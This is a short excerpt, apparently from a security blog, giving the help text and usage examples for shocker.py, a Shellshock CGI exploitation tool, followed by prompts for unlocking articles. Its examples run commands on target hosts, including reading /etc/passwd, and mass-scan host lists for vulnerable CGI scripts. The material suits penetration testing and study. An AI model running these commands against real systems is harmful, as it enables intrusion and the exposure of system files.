#Help Text usage: shocker.py [Options] -h, --help show this help message and exit --Host HOST, -H HOST A target hostname or IP address --file FILE, -f FILE File containing a list of targets --port PORT, -p PORT The target port number (default=80) --exploit EXPLOIT, -e EXPLOIT Command to execute (default=/bin/uname -a) --cgi CGI, -c CGI Single CGI to check (e.g. /cgi-bin/test.cgi) --proxy PROXY A BIT BROKEN RIGHT NOW Proxy to be used in the form 'ip:port' --ssl, -s Use SSL (default=False) --threads THREADS, -t THREADS Maximum number of threads (default=10, max=100) --verbose, -v Be verbose in output
测试案例
1 2 3 4 5 6 7 8 9 10 11
# Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat /etc/passwd python shocker.py -H 192.168.56.118 --command"/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
# Scan www.example.com on port 8001 using SSL for all scripts in cgi_list and attempts the default exploit for any found
python shocker.py -H www.example.com -p 8001 -s
# Scans all hosts listed in the file ./hostlist with the default options python shocker.py -f ./hostlist
方式1.请访问本博主的B站【WeiyiGeek】首页关注UP主, 将自动随机获取解锁验证码。
Method 2.Please visit 【My Twitter】. There is an article verification code in the homepage.
方式3.扫一扫下方二维码,关注本站官方公众号
回复:验证码
将获取解锁(有效期7天)本站所有技术文章哟!